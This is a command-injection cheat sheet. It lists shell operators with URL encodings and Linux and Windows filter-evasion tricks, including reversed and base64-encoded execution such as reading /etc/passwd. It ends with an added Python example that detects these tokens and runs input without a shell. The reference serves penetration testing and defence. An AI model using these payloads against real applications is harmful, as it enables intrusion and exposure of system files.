🔧 Injection Operators
🧪 Semicolon
; %3b # → Executes both commands (Linux & Windows)
🔃 New Line
\n %0a # → Executes both commands (Linux & Windows)
🖼️ Background
& %26 # → Executes both commands (second output usually appears first)
🧵 Pipe
| %7c # → Executes both commands (only second output is shown)
🟢 AND Operator
&& %26%26 # → Executes second command only if first succeeds (Linux & Windows)
🔴 OR Operator
|| %7c%7c # → Executes second command only if first fails (Linux & Windows)
🌀 Sub-Shell (Linux Only)
`` %60%60 # → Sub-shell execution (Linux-only)
$() %24%28%29 # → Sub-shell execution (Linux-only)
🐧 Linux - Filtered Character Bypass
🔍 View Environment Variables
printenv # Displays all environment variables
⛓️ Space Bypass
%09 # Use tab instead of space
${IFS} # Replaced with space/tab (Not usable in sub-shells)
{ls,-la} # Commas replaced with spaces
🔀 Other Character Bypass
${PATH:0:1} # Replaced with /
${LS_COLORS:10:1} # Replaced with ;
$(tr '!-}' '"-~'<<<[) # Shift character by one ([ -> \)
⛔ Blacklisted Command Bypass
✒️ Character Insertion
' or " # Must be an even number of quotes
$@ or \ # Linux only
🔠 Case Manipulation
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") # Lowercase conversion and execution
$(a="WhOaMi";printf %s "${a,,}") # Another lowercase technique
🔄 Reversed Commands
echo 'whoami' | rev # Reverse string
eval $(rev<<<'imaohw') # Execute reversed command
📦 Encoded Commands
echo -n 'cat /etc/passwd | grep 33' | base64 # Encode with base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) # Execute base64 encoded command
📦 Windows - Filtered Character Bypass
🔍 View Environment Variables (PowerShell)
Get-ChildItem Env: # View all environment variables
⛓️ Space Bypass
%09 # Tab instead of space
%PROGRAMFILES:~10,-5% # CMD: Replaced with space
$env:PROGRAMFILES[10] # PowerShell: Replaced with space
🔁 Other Character Bypass
%HOMEPATH:~0,-17% # CMD: Replaced with \
$env:HOMEPATH[0] # PowerShell: Replaced with \
⛔ Blacklisted Command Bypass
✒️ Character Insertion
' or " # Must be an even number of quotes
^ # Windows-only escape character (CMD)
🔠 Case Manipulation
WhoAmi # Use mixed case to bypass basic filters
🔄 Reversed Commands
"whoami"[-1..-20] -join '' # Reverse string
iex "$('imaohw'[-1..-20] -join '')" # Execute reversed command
📦 Encoded Commands
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) # Encode command
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))" # Decode & execute
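
🛡️ Defensive counterpart to the operators and bypasses listed above. This is an added example, not part of the original cheat sheet. It URL-decodes a parameter and reports the shell tokens it carries, validates against a strict allowlist, and runs the value as a single argv element so no shell parses it. The function names and the IPv4-only parameter are assumptions made for illustration.

```python
import re
import subprocess
import sys
from urllib.parse import unquote

# Operators and expansions from the list above: ; newline & | ` $( ${
# (&& and || are caught through their single characters).
SHELL_META = re.compile(r"[;\n&|`]|\$\(|\$\{")

# Assumption: the endpoint accepts one IPv4 address and nothing else.
OCTET = r"(?:25[0-5]|2[0-4][0-9]|1?[0-9]?[0-9])"
IPV4 = re.compile(r"(?:%s\.){3}%s" % (OCTET, OCTET))


def find_operators(raw_param):
    """URL-decode a raw parameter and return the shell tokens it carries."""
    return sorted(set(SHELL_META.findall(unquote(raw_param))))


def is_valid_target(raw_param):
    """Allowlist: the decoded value must be an IPv4 address in full."""
    return IPV4.fullmatch(unquote(raw_param)) is not None


def run_without_shell(value):
    """Pass value as one argv element; no shell parses it, so operators are inert."""
    # A child Python echoing argv[1] stands in for the real tool (e.g. ping).
    child = [sys.executable, "-c", "import sys; print(sys.argv[1])", value]
    done = subprocess.run(child, capture_output=True, text=True, check=True)
    return done.stdout.rstrip("\n")


if __name__ == "__main__":
    # Constructed sample parameter values, as they would appear in an access log.
    samples = ["127.0.0.1", "127.0.0.1%3bwhoami", "127.0.0.1%0awhoami",
               "127.0.0.1%26%26whoami", "127.0.0.1%09whoami",
               "127.0.0.1${IFS}whoami", "127.0.0.1%7c%7cwho$@ami"]
    for s in samples:
        print(repr(s), "operators:", find_operators(s), "valid:", is_valid_target(s))
    print(run_without_shell("127.0.0.1; whoami"))
```

The `%09` sample carries no operator and passes the pattern check, yet fails the allowlist. Pattern matching is therefore useful for log triage only, while the allowlist and shell-free execution are the actual controls.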